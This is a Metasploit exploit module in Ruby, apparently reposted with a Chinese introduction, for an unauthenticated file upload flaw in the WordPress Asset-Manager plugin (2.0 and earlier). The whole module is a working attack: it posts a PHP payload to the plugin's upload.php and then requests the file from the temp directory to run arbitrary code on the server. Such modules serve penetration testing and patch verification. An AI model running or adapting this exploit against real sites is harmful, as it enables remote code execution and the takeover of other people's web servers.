
WordPress Asset-Manager PHP文件上传漏洞

该 Metasploit 模块利用 WordPress Asset-Manager 插件 2.0 及更低版本中的文件上传漏洞：插件自带的 upload.php 不做身份验证，允许任何人将 PHP 文件上传到插件的临时目录（wp-content/uploads/assets/temp/），随后直接访问该文件即可执行任意代码。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

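# Framework core plus the PhpEXE mixin that builds the write-and-exec PHP stub.
require 'msf/core'
require 'msf/core/exploit/php_exe'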
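##
# Exploit for the unauthenticated PHP file upload in the WordPress
# Asset-Manager plugin (<= 2.0). The plugin's upload.php stores whatever is
# sent in the "Filedata" multipart field under wp-content/uploads/assets/temp/
# without requiring a login or checking the extension, so a .php payload
# dropped there can be triggered with a plain GET.
#
# Flow: upload a randomly named PHP file, confirm the server echoes the name
# back, then request it so it runs. The PHP stub unlinks itself after
# execution so no web shell is left behind on the target.
#
# NOTE(review): the temp directory below is the plugin's default location. If
# the site relocates wp-content/uploads the trigger request 404s and the
# module reports "Execution failed" — confirm the path against the target.
##
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Path (relative to TARGETURI) of the vulnerable upload handler.
  UPLOAD_HANDLER = 'wp-content/plugins/asset-manager/upload.php'.freeze
  # Path (relative to TARGETURI) of the directory the handler writes into.
  TEMP_DIR = 'wp-content/uploads/assets/temp/'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ]
          # NOTE(review): the reposting site replaced the original advisory
          # URL reference with a link to itself; restore the real URL from the
          # upstream Metasploit module instead of citing the mirror.
        ],
      'Payload'        =>
        {
          # The PHP stub is embedded in a string; NUL would truncate it.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Entry point: upload the PHP payload, then request it so it executes.
  # Aborts via fail_with on any unexpected upload response.
  def exploit
    base_uri = wordpress_base_uri
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP stub that writes out and runs the selected payload, then deletes
    # itself from disk so the target is not left with a persistent shell.
    php_payload = get_write_exec_payload(:unlink_self => true)

    upload_payload(base_uri, payload_name, php_payload)
    trigger_payload(base_uri, payload_name)
  end

  private

  # TARGETURI with exactly one trailing slash so relative paths can be
  # appended directly. An empty path becomes "/".
  def wordpress_base_uri
    path = target_uri.path.to_s
    path.end_with?('/') ? path : "#{path}/"
  end

  # POST the payload as the "Filedata" multipart field of upload.php.
  # The handler is expected to answer 200 and echo the stored file name;
  # anything else is treated as a failed upload.
  def upload_payload(base_uri, payload_name, php_payload)
    data = Rex::MIME::Message.new
    data.add_part(php_payload, 'application/octet-stream', nil,
      "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Drop the CRLF Rex emits ahead of the first boundary; the body must
    # start with the boundary itself for PHP to parse the upload.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base_uri}#{UPLOAD_HANDLER}",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Escape the name so the "." in ".php" is matched literally.
    unless res && res.code == 200 && res.body =~ /#{Regexp.escape(payload_name)}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end
  end

  # GET the uploaded file from the plugin's temp directory to run it.
  # No response at all is tolerated (the payload may hold the connection
  # open); an explicit non-200 status means the file is not where expected.
  def trigger_payload(base_uri, payload_name)
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{base_uri}#{TEMP_DIR}#{payload_name}",
      'method' => 'GET'
    })

    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end

  # "host:port" label used to prefix status messages.
  def peer
    "#{rhost}:#{rport}"
  end
end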